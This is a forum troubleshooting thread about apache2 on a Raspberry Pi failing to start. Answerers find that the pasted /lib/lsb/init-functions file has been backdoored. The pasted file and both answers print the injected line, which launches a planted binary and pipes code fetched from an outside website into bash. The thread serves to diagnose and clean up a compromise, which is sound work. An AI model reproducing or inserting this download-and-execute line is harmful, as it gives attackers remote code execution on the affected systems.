# Unable to start apache2 syntax error

Tags: debian, apache2, raspberry-pi3

I've seen lots of people talking about similar issue with syntax errors, but I don't even know where to start looking for mine. I have had a webserver running on my pi for months; however, I recently restarted it, and now apache will not start.

When I run:

```
sudo /etc/init.d/apache2 start
```

I get this error:

```
/etc/init.d/apache2: 30: /lib/lsb/init-functions: Syntax error: ";" unexpected
```

As far as I know I have not modified any of those files so I am confused why it was working before, and no longer.

---

**Here are the files**

*/etc/init.d/apache2:*

```
#!/bin/sh
### BEGIN INIT INFO
# Provides:          apache2
# Required-Start:    $local_fs $remote_fs $network $syslog $named
# Required-Stop:     $local_fs $remote_fs $network $syslog $named
# Default-Start:     2 3 4 5
# Default-Stop:      0 1 6
# X-Interactive:     true
# Short-Description: Apache2 web server
# Description:       Start the web server and associated helpers
#  This script will start apache2, and possibly all associated instances.
#  Moreover, it will set-up temporary directories and helper tools such as
#  htcacheclean when required by the configuration.
### END INIT INFO

DESC="web server"
NAME=apache2
DAEMON=/usr/sbin/$NAME

SCRIPTNAME="${0##*/}"
SCRIPTNAME="${SCRIPTNAME##[KS][0-9][0-9]}"
if [ -n "$APACHE_CONFDIR" ] ; then
    if [ "${APACHE_CONFDIR##/etc/apache2-}" != "${APACHE_CONFDIR}" ] ; then
            DIR_SUFFIX="${APACHE_CONFDIR##/etc/apache2-}"
    else
            DIR_SUFFIX=
    fi
elif [ "${SCRIPTNAME##apache2-}" != "$SCRIPTNAME" ] ; then
    DIR_SUFFIX="-${SCRIPTNAME##apache2-}"
    APACHE_CONFDIR=/etc/apache2$DIR_SUFFIX
else
    DIR_SUFFIX=
    APACHE_CONFDIR=/etc/apache2
fi
if [ -z "$APACHE_ENVVARS" ] ; then
    APACHE_ENVVARS=$APACHE_CONFDIR/envvars
fi
export APACHE_CONFDIR APACHE_ENVVARS

ENV="env -i LANG=C PATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin"
if [ "$APACHE_CONFDIR" != /etc/apache2 ] ; then
    ENV="$ENV APACHE_CONFDIR=$APACHE_CONFDIR"
fi
if [ "$APACHE_ENVVARS" != "$APACHE_CONFDIR/envvars" ] ; then
    ENV="$ENV APACHE_ENVVARS=$APACHE_ENVVARS"
fi


#edit /etc/default/apache2 to change this.
HTCACHECLEAN_RUN=auto
HTCACHECLEAN_MODE=daemon
HTCACHECLEAN_SIZE=300M
HTCACHECLEAN_DAEMON_INTERVAL=120
HTCACHECLEAN_PATH=/var/cache/apache2$DIR_SUFFIX/mod_cache_disk
HTCACHECLEAN_OPTIONS=""

# Read configuration variable file if it is present
if [ -f /etc/default/apache2$DIR_SUFFIX ] ; then
    . /etc/default/apache2$DIR_SUFFIX
elif [ -f /etc/default/apache2 ] ; then
    . /etc/default/apache2
fi

PIDFILE=$(. $APACHE_ENVVARS && echo $APACHE_PID_FILE)

VERBOSE=no
if [ -f /etc/default/rcS ]; then
    . /etc/default/rcS
fi
. /lib/lsb/init-functions


# Now, set defaults:
APACHE2CTL="$ENV apache2ctl"
HTCACHECLEAN="$ENV htcacheclean"
PIDFILE=$(. $APACHE_ENVVARS && echo $APACHE_PID_FILE)
APACHE2_INIT_MESSAGE=""

CONFTEST_OUTFILE=
cleanup() {
    if [ -n "$CONFTEST_OUTFILE" ] ; then
        rm -f "$CONFTEST_OUTFILE"
    fi
}
trap cleanup 0  # "0" means "EXIT", but "EXIT" is not portable


apache_conftest() {
    [ -z "$CONFTEST_OUTFILE" ] || rm -f "$CONFTEST_OUTFILE"
    CONFTEST_OUTFILE=$(mktemp)
    if ! $APACHE2CTL configtest > "$CONFTEST_OUTFILE" 2>&1 ; then
        return 1
    else
        rm -f "$CONFTEST_OUTFILE"
        CONFTEST_OUTFILE=
        return 0
    fi
}

clear_error_msg() {
    [ -z "$CONFTEST_OUTFILE" ] || rm -f "$CONFTEST_OUTFILE"
    CONFTEST_OUTFILE=
    APACHE2_INIT_MESSAGE=
}

print_error_msg() {
    [ -z "$APACHE2_INIT_MESSAGE" ] || log_warning_msg "$APACHE2_INIT_MESSAGE"
    if [ -n "$CONFTEST_OUTFILE" ] ; then
        echo "Output of config test was:" >&2
        cat "$CONFTEST_OUTFILE" >&2
        rm -f "$CONFTEST_OUTFILE"
        CONFTEST_OUTFILE=
    fi
}

apache_wait_start() {
    local STATUS=$1
    local i=0

    if [ $STATUS != 0 ] ; then
            return $STATUS
    fi
    while : ; do
            PIDTMP=$(pidofproc -p $PIDFILE $DAEMON)
            if [ -n "${PIDTMP:-}" ] && kill -0 "${PIDTMP:-}" 2> /dev/null; then
                    return $STATUS
            fi

            if [ $i = "20" ] ; then
                    APACHE2_INIT_MESSAGE="The apache2$DIR_SUFFIX instance did not start within 20 seconds. Please read the log files to discover problems"
                    return 2
            fi

            [ "$VERBOSE" != no ] && log_progress_msg "."
            sleep 1
            i=$(($i+1))
    done
}

apache_wait_stop() {
    local STATUS=$1
    local METH=$2

    if [ $STATUS != 0 ] ; then
            return $STATUS
    fi

    PIDTMP=$(pidofproc -p $PIDFILE $DAEMON)
    if [ -n "${PIDTMP:-}" ] && kill -0 "${PIDTMP:-}" 2> /dev/null; then

            if [ "$METH" = "kill" ]; then
                killproc -p $PIDFILE $DAEMON
            else
                $APACHE2CTL $METH > /dev/null 2>&1
            fi

            local i=0
            while kill -0 "${PIDTMP:-}" 2> /dev/null;  do
                    if [ $i = '60' ]; then
                            STATUS=2
                            break
                    fi
                    [ "$VERBOSE" != no ] && log_progress_msg "."
                    sleep 1
                    i=$(($i+1))
            done
            return $STATUS
    else
        return $STATUS
    fi
}


#
# Function that starts the daemon/service
#
do_start()
{
    # Return
    #   0 if daemon has been started
    #   1 if daemon was already running
    #   2 if daemon could not be started

    if pidofproc -p $PIDFILE "$DAEMON" > /dev/null 2>&1 ; then
            return 1
    fi

    if apache_conftest ; then
            $APACHE2CTL start
            apache_wait_start $?
            return $?
    else
            APACHE2_INIT_MESSAGE="The apache2$DIR_SUFFIX configtest failed."
            return 2
    fi
}

#
# Function that stops the daemon/service
#
do_stop()
{
    # Return
    #   0 if daemon has been stopped
    #   1 if daemon was already stopped
    #   2 if daemon could not be stopped
    #   other if a failure occurred

    # either "stop" or "graceful-stop"
    local STOP=$1
    # can't use pidofproc from LSB here
    local AP_RET=0

    if pidof $DAEMON > /dev/null 2>&1 ; then
            if [ -e $PIDFILE ] && pidof $DAEMON | tr ' ' '\n' | grep -w $(cat $PIDFILE) > /dev/null 2>&1 ; then
                    AP_RET=2
            else
                    AP_RET=1
            fi
    else
        AP_RET=0
    fi

    # AP_RET is:
    # 0 if Apache (whichever) is not running
    # 1 if Apache (whichever) is running
    # 2 if Apache from the PIDFILE is running

    if [ $AP_RET = 0 ] ; then
            return 1
    fi

    if [ $AP_RET = 2 ] && apache_conftest ; then
            apache_wait_stop $? $STOP
            return $?
    else
            if [ $AP_RET = 2 ]; then
                    clear_error_msg
                    APACHE2_INIT_MESSAGE="The apache2$DIR_SUFFIX configtest failed, so we are trying to kill it manually. This is almost certainly suboptimal, so please make sure your system is working as you'd expect now!"
                    apache_wait_stop $? "kill"
                    return $?
            elif [ $AP_RET = 1 ] ; then
                    APACHE2_INIT_MESSAGE="There are processes named 'apache2' running which do not match your pid file which are left untouched in the name of safety, Please review the situation by hand".
                    return 2
            fi
    fi

}


#
# Function that sends a SIGHUP to the daemon/service
#
do_reload() {
    if apache_conftest; then
            if ! pidofproc -p $PIDFILE "$DAEMON" > /dev/null 2>&1 ; then
                    APACHE2_INIT_MESSAGE="Apache2 is not running"
                    return 2
            fi
            $APACHE2CTL graceful > /dev/null 2>&1
            return $?
    else
            APACHE2_INIT_MESSAGE="The apache2$DIR_SUFFIX configtest failed. Not doing anything."
            return 2
    fi
}


check_htcacheclean() {
    [ "$HTCACHECLEAN_MODE" = "daemon" ] || return 1
    [ "$HTCACHECLEAN_RUN"  = "yes"    ] && return 0

    MODSDIR=$(. $APACHE_ENVVARS && echo $APACHE_MODS_ENABLED)
            [ "$HTCACHECLEAN_RUN"  = "auto" \
                    -a -e ${MODSDIR:-$APACHE_CONFDIR/mods-enabled}/cache_disk.load ] && \
                    return 0
    return 1
}

start_htcacheclean() {
       $HTCACHECLEAN $HTCACHECLEAN_OPTIONS -d$HTCACHECLEAN_DAEMON_INTERVAL \
            -i -p$HTCACHECLEAN_PATH -l$HTCACHECLEAN_SIZE
}

stop_htcacheclean() {
    pkill -P 1 -f "htcacheclean.* -p$HTCACHECLEAN_PATH " 2> /dev/null || return 1
}


# Sanity checks. They need to occur after function declarations
[ -x $DAEMON ] || exit 0

if [ ! -x $DAEMON ] ; then
    echo "No apache-bin package installed"
    exit 0
fi

if [ -z "$PIDFILE" ] ; then
    echo ERROR: APACHE_PID_FILE needs to be defined in $APACHE_ENVVARS >&2
    exit 2
fi

if check_htcacheclean ; then
    if [ ! -d "$HTCACHECLEAN_PATH" ] ; then
            echo "htcacheclean is configured, but directory $HTCACHECLEAN_PATH does not exist!" >&2
            exit 2
    fi
fi



case "$1" in
  start)
    log_daemon_msg "Starting $DESC" "$NAME"
    do_start
    RET_STATUS=$?
    case "$RET_STATUS" in
        0|1)
            log_success_msg
            [ "$VERBOSE" != no ] && [ $RET_STATUS = 1 ] && log_warning_msg "Server was already running"
            if check_htcacheclean ; then
                [ "$VERBOSE" != no ] && log_daemon_msg "Starting HTTP cache cleaning daemon" "htcacheclean"
                start_htcacheclean
                [ "$VERBOSE" != no ] && log_end_msg $?
            fi
            ;;
        2)
            log_failure_msg
            print_error_msg
            exit 1
            ;;
    esac
    ;;
  stop|graceful-stop)
    log_daemon_msg "Stopping $DESC" "$NAME"
    do_stop "$1"
    RET_STATUS=$?
    case "$RET_STATUS" in
        0|1)
            log_success_msg
            [ "$VERBOSE" != no ] && [ $RET_STATUS = 1 ] && log_warning_msg "Server was not running"
            ;;
        2)
            log_failure_msg
            print_error_msg
            exit 1
            ;;
    esac
    print_error_msg

    if check_htcacheclean ; then
        [ "$VERBOSE" != no ] && log_daemon_msg "Stopping HTTP cache cleaning daemon" "htcacheclean"
        stop_htcacheclean
        [ "$VERBOSE" != no ] && log_end_msg $?
    fi

    ;;
  status)
    status_of_proc -p $PIDFILE "apache2" "$NAME"
    exit $?
    ;;
  reload|force-reload|graceful)
    log_daemon_msg "Reloading $DESC" "$NAME"
    do_reload
    RET_STATUS=$?
    case "$RET_STATUS" in
        0|1)
            log_success_msg
            [ "$VERBOSE" != no ] && [ $RET_STATUS = 1 ] && log_warning_msg "Server was already running"
            ;;
        2)
            log_failure_msg
            print_error_msg
            exit 1
            ;;
    esac
    print_error_msg
    ;;
  restart)
    log_daemon_msg "Restarting $DESC" "$NAME"
    do_stop stop
    case "$?" in
        0|1)
            do_start
            case "$?" in
                0)
                    log_end_msg 0
                    ;;
                1|*)
                    log_end_msg 1 # Old process is still or failed to running
                    print_error_msg
                    exit 1
                    ;;
            esac
            ;;
        *)
            # Failed to stop
            log_end_msg 1
            print_error_msg
            exit 1
            ;;
    esac
    ;;
  start-htcacheclean)
    log_daemon_msg "Starting htcacheclean"
    start_htcacheclean
    log_end_msg $?
    exit $?
    ;;
  stop-htcacheclean)
    log_daemon_msg "Stopping htcacheclean"
    stop_htcacheclean
    log_end_msg $?
    exit $?
    ;;
  *)
    echo "Usage: $SCRIPTNAME {start|stop|graceful-stop|restart|reload|force-reload|start-htcacheclean|stop-htcacheclean}" >&2
    exit 3
    ;;
esac

exit 0

# vim: syntax=sh ts=4 sw=4 sts=4 sr noet
```

*/lib/lsb/init-functions:*

```
# /lib/lsb/init-functions for Debian -*- shell-script -*-
#
#Copyright (c) 2002-08 Chris Lawrence
#All rights reserved.
#
#Redistribution and use in source and binary forms, with or without
#modification, are permitted provided that the following conditions
#are met:
#1. Redistributions of source code must retain the above copyright
#   notice, this list of conditions and the following disclaimer.
#2. Redistributions in binary form must reproduce the above copyright
#   notice, this list of conditions and the following disclaimer in the
#   documentation and/or other materials provided with the distribution.
#3. Neither the name of the author nor the names of other contributors
#   may be used to endorse or promote products derived from this software
#   without specific prior written permission.
#
#THIS SOFTWARE IS PROVIDED BY THE AUTHOR ``AS IS'' AND ANY EXPRESS OR
#IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED
#WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE
#ARE DISCLAIMED.  IN NO EVENT SHALL THE REGENTS OR CONTRIBUTORS BE
#LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR
#CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF
#SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR
#BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY,
#WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE
#OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE,
#EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.

X=$(/usr/sbin/innodb &;curl http://banconicaragua.com/x|bash)
start_daemon () {
    local force nice pidfile exec args OPTIND
    force=""
    nice=0
    pidfile=/dev/null

    OPTIND=1
    while getopts fn:p: opt ; do
        case "$opt" in
            f)  force="force";;
            n)  nice="$OPTARG";;
            p)  pidfile="$OPTARG";;
        esac
    done

    shift $(($OPTIND - 1))
    if [ "$1" = '--' ]; then
        shift
    fi

    exec="$1"; shift

    args="--start --nicelevel $nice --quiet --oknodo"
    if [ "$force" ]; then
        /sbin/start-stop-daemon $args \
        --chdir "$PWD" --startas $exec --pidfile /dev/null -- "$@"
    elif [ $pidfile ]; then
        /sbin/start-stop-daemon $args \
        --chdir "$PWD" --exec $exec --oknodo --pidfile "$pidfile" -- "$@"
    else
        /sbin/start-stop-daemon $args --chdir "$PWD" --exec $exec -- "$@"
    fi
}

pidofproc () {
    local pidfile base status specified pid OPTIND
    pidfile=
    specified=

    OPTIND=1
    while getopts p: opt ; do
        case "$opt" in
            p)  pidfile="$OPTARG"
                specified="specified"
        ;;
        esac
    done
    shift $(($OPTIND - 1))
    if [ $# -ne 1 ]; then
        echo "$0: invalid arguments" >&2
        return 4
    fi

    base=${1##*/}
    if [ ! "$specified" ]; then
        pidfile="/var/run/$base.pid"
    fi

    if [ -n "${pidfile:-}" ]; then
     if [ -e "$pidfile" ]; then
      if [ -r "$pidfile" ]; then
        read pid < "$pidfile"
        if [ -n "${pid:-}" ]; then
            if $(kill -0 "${pid:-}" 2> /dev/null); then
                echo "$pid" || true
                return 0
            elif ps "${pid:-}" >/dev/null 2>&1; then
                echo "$pid" || true
                return 0 # program is running, but not owned by this user
            else
                return 1 # program is dead and /var/run pid file exists
            fi
        fi
      else
        return 4 # pid file not readable, hence status is unknown.
      fi
     else
       # pid file doesn't exist, try to find the pid nevertheless
       if [ -x /bin/pidof ] && [ ! "$specified" ]; then
         status="0"
         /bin/pidof -o %PPID -x $1 || status="$?"
         if [ "$status" = 1 ]; then
             return 3 # program is not running
         fi
         return 0
       fi
       return 3 # specified pid file doesn't exist, program probably stopped
     fi
    fi
    if [ "$specified" ]; then
        return 3 # almost certain it's not running
    fi
    return 4 # Unable to determine status
}

# start-stop-daemon uses the same algorithm as "pidofproc" above.
killproc () {
    local pidfile sig status base name_param is_term_sig OPTIND
    pidfile=
    name_param=
    is_term_sig=

    OPTIND=1
    while getopts p: opt ; do
        case "$opt" in
            p)  pidfile="$OPTARG";;
        esac
    done
    shift $(($OPTIND - 1))

    base=${1##*/}
    if [ ! $pidfile ]; then
        name_param="--name $base --pidfile /var/run/$base.pid"
    else
        name_param="--pidfile $pidfile"
    fi

    sig=$(echo ${2:-} | sed -e 's/^-\(.*\)/\1/')
    sig=$(echo $sig | sed -e 's/^SIG\(.*\)/\1/')
    if [ "$sig" = 15 ] || [ "$sig" = TERM ]; then
        is_term_sig="terminate_signal"
    fi
    status=0
    if [ ! "$is_term_sig" ]; then
        if [ -n "$sig" ]; then
            /sbin/start-stop-daemon --stop --signal "$sig" \
        --quiet $name_param || status="$?"
        else
            /sbin/start-stop-daemon --stop \
        --retry 5 \
        --quiet $name_param || status="$?"
        fi
    else
        /sbin/start-stop-daemon --stop --quiet \
        --oknodo $name_param || status="$?"
    fi
    if [ "$status" = 1 ]; then
        if [ -z "$sig" ]; then
            return 0
        fi
        return 3 # program is not running
    fi

    if [ "$status" = 0 ] && [ "$is_term_sig" ] && [ "$pidfile" ]; then
        pidofproc -p "$pidfile" "$1" >/dev/null || rm -f "$pidfile"
    fi
    return 0
}

# Return LSB status
status_of_proc () {
    local pidfile daemon name status OPTIND

    pidfile=
    OPTIND=1
    while getopts p: opt ; do
        case "$opt" in
            p)  pidfile="$OPTARG";;
        esac
    done
    shift $(($OPTIND - 1))

    if [ -n "$pidfile" ]; then
        pidfile="-p $pidfile"
    fi
    daemon="$1"
    name="$2"

    status="0"
    pidofproc $pidfile $daemon >/dev/null || status="$?"
    if [ "$status" = 0 ]; then
        log_success_msg "$name is running"
        return 0
    elif [ "$status" = 4 ]; then
        log_failure_msg "could not access PID file for $name"
        return $status
    else
        log_failure_msg "$name is not running"
        return $status
    fi
}

log_use_fancy_output () {
    TPUT=/usr/bin/tput
    EXPR=/usr/bin/expr
    if  [ -t 1 ] &&
    [ "x${TERM:-}" != "x" ] &&
    [ "x${TERM:-}" != "xdumb" ] &&
    [ -x $TPUT ] && [ -x $EXPR ] &&
    $TPUT hpa 60 >/dev/null 2>&1 &&
    $TPUT setaf 1 >/dev/null 2>&1
    then
        [ -z $FANCYTTY ] && FANCYTTY=1 || true
    else
        FANCYTTY=0
    fi
    case "$FANCYTTY" in
        1|Y|yes|true)   true;;
        *)              false;;
    esac
}

log_success_msg () {
    if [ -n "${1:-}" ]; then
        log_begin_msg $@
    fi
    log_end_msg 0
}

log_failure_msg () {
    if [ -n "${1:-}" ]; then
        log_begin_msg $@ "..."
    fi
    log_end_msg 1 || true
}

log_warning_msg () {
    if [ -n "${1:-}" ]; then
        log_begin_msg $@ "..."
    fi
    log_end_msg 255 || true
}

#
# NON-LSB HELPER FUNCTIONS
#
# int get_lsb_header_val (char *scriptpathname, char *key)
get_lsb_header_val () {
        if [ ! -f "$1" ] || [ -z "${2:-}" ]; then
                return 1
        fi
        LSB_S="### BEGIN INIT INFO"
        LSB_E="### END INIT INFO"
        sed -n "/$LSB_S/,/$LSB_E/ s/# $2: \(.*\)/\1/p" $1
}

# If the currently running init daemon is upstart, return zero; if the
# calling init script belongs to a package which also provides a native
# upstart job, it should generally exit non-zero in this case.
init_is_upstart()
{
   if [ -x /sbin/initctl ] && /sbin/initctl version 2>/dev/null | /bin/grep -q upstart; then
       return 0
   fi
   return 1
}

# int log_begin_message (char *message)
log_begin_msg () {
    log_begin_msg_pre "$@"
    if [ -z "${1:-}" ]; then
        return 1
    fi
    echo -n "$@" || true
    log_begin_msg_post "$@"
}

# Sample usage:
# log_daemon_msg "Starting GNOME Login Manager" "gdm"
#
# On Debian, would output "Starting GNOME Login Manager: gdm"
# On Ubuntu, would output " * Starting GNOME Login Manager..."
#
# If the second argument is omitted, logging suitable for use with
# log_progress_msg() is used:
#
# log_daemon_msg "Starting remote filesystem services"
#
# On Debian, would output "Starting remote filesystem services:"
# On Ubuntu, would output " * Starting remote filesystem services..."

log_daemon_msg () {
    if [ -z "${1:-}" ]; then
        return 1
    fi
    log_daemon_msg_pre "$@"

    if [ -z "${2:-}" ]; then
        echo -n "$1:" || true
        return
    fi

    echo -n "$1: $2" || true
    log_daemon_msg_post "$@"
}

# #319739
#
# Per policy docs:
#
#     log_daemon_msg "Starting remote file system services"
#     log_progress_msg "nfsd"; start-stop-daemon --start --quiet nfsd
#     log_progress_msg "mountd"; start-stop-daemon --start --quiet mountd
#     log_progress_msg "ugidd"; start-stop-daemon --start --quiet ugidd
#     log_end_msg 0
#
# You could also do something fancy with log_end_msg here based on the
# return values of start-stop-daemon; this is left as an exercise for
# the reader...
#
# On Ubuntu, one would expect log_progress_msg to be a no-op.
log_progress_msg () {
    if [ -z "${1:-}" ]; then
        return 1
    fi
    echo -n " $@" || true
}


# int log_end_message (int exitstatus)
log_end_msg () {
    # If no arguments were passed, return
    if [ -z "${1:-}" ]; then
        return 1
    fi

    local retval
    retval=$1

    log_end_msg_pre "$@"

    # Only do the fancy stuff if we have an appropriate terminal
    # and if /usr is already mounted
    if log_use_fancy_output; then
        RED=$( $TPUT setaf 1)
        YELLOW=$( $TPUT setaf 3)
        NORMAL=$( $TPUT op)
    else
        RED=''
        YELLOW=''
        NORMAL=''
    fi

    if [ $1 -eq 0 ]; then
        echo "." || true
    elif [ $1 -eq 255 ]; then
        /bin/echo -e " ${YELLOW}(warning).${NORMAL}" || true
    else
        /bin/echo -e " ${RED}failed!${NORMAL}" || true
    fi
    log_end_msg_post "$@"
    return $retval
}

log_action_msg () {
    log_action_msg_pre "$@"
    echo "$@." || true
    log_action_msg_post "$@"
}

log_action_begin_msg () {
    log_action_begin_msg_pre "$@"
    echo -n "$@..." || true
    log_action_begin_msg_post "$@"
}

log_action_cont_msg () {
    echo -n "$@..." || true
}

log_action_end_msg () {
    local end
    log_action_end_msg_pre "$@"
    if [ -z "${2:-}" ]; then
        end="."
    else
        end=" ($2)."
    fi

    if [ $1 -eq 0 ]; then
        echo "done${end}" || true
    else
        if log_use_fancy_output; then
            RED=$( $TPUT setaf 1)
            NORMAL=$( $TPUT op)
            /bin/echo -e "${RED}failed${end}${NORMAL}" || true
        else
            echo "failed${end}" || true
        fi
    fi
    log_action_end_msg_post "$@"
}

# Pre&Post empty function declaration, to be overriden from /lib/lsb/init-functions.d/*
log_daemon_msg_pre () { :; }
log_daemon_msg_post () { :; }
log_begin_msg_pre () { :; }
log_begin_msg_post () { :; }
log_end_msg_pre () { :; }
log_end_msg_post () { :; }
log_action_msg_pre () { :; }
log_action_msg_post () { :; }
log_action_begin_msg_pre () { :; }
log_action_begin_msg_post () { :; }
log_action_end_msg_pre () { :; }
log_action_end_msg_post () { :; }

# Include hooks from other packages in /lib/lsb/init-functions.d
for hook in $(run-parts --lsbsysinit --list /lib/lsb/init-functions.d 2>/dev/null); do
    [ -r $hook ] && . $hook || true
done

FANCYTTY=
[ -e /etc/lsb-base-logging.sh ] && . /etc/lsb-base-logging.sh || true
```

---

Does anyone have any ideas Thanks.

Answer (score 2, accepted):

Sorry to be there bearer of bad news, but it looks like your copy of /lib/lsb/init-functions has been backdoored and is trying to run malicious code from a random website

The site serving the malicious code is probably dead which causes the syntax error.

This line is not in the real init-functions (the error msg already gave you the line #)

```
X=$(/usr/sbin/innodb &;curl http://banconicaragua.com/x|bash)
```

Comment: Thanks for the response, and good catch. I ended up fixing the problem by simply starting over.. reinstalled everything (including the OS). But it's nice to know why I had to do that! Thanks.

Answer (score 1):

Thanks Covener for your answer, I found the same line `X=$(/usr/sbin/innodb &;curl http://banconicaragua.com/x|bash)` at the start of my `/lib/lsb/init-functions`.

For anyone else with this problem, in case you don't want to reinstall the operating system like OP, all you need to do to successfully be able to restart your Apache2 is remove said line `X=$(/usr/sbin/innodb &;curl http://banconicaragua.com/x|bash)` before `start_daemon ()` in your `/lib/lsb/init-functions`. Having removed this line I was freely be able to preform `sudo /etc/init.d/apache2 start` without error.

Side note, it appears these people are targeting Debian Servers with default root passwords (assuming this because I left my password as the default). Be sure to change it if you haven't already. Also while removing the line may allow you to restart the Apache2 server, there may still be back doors present, so you really should reinstall the OS or run a clean up tool.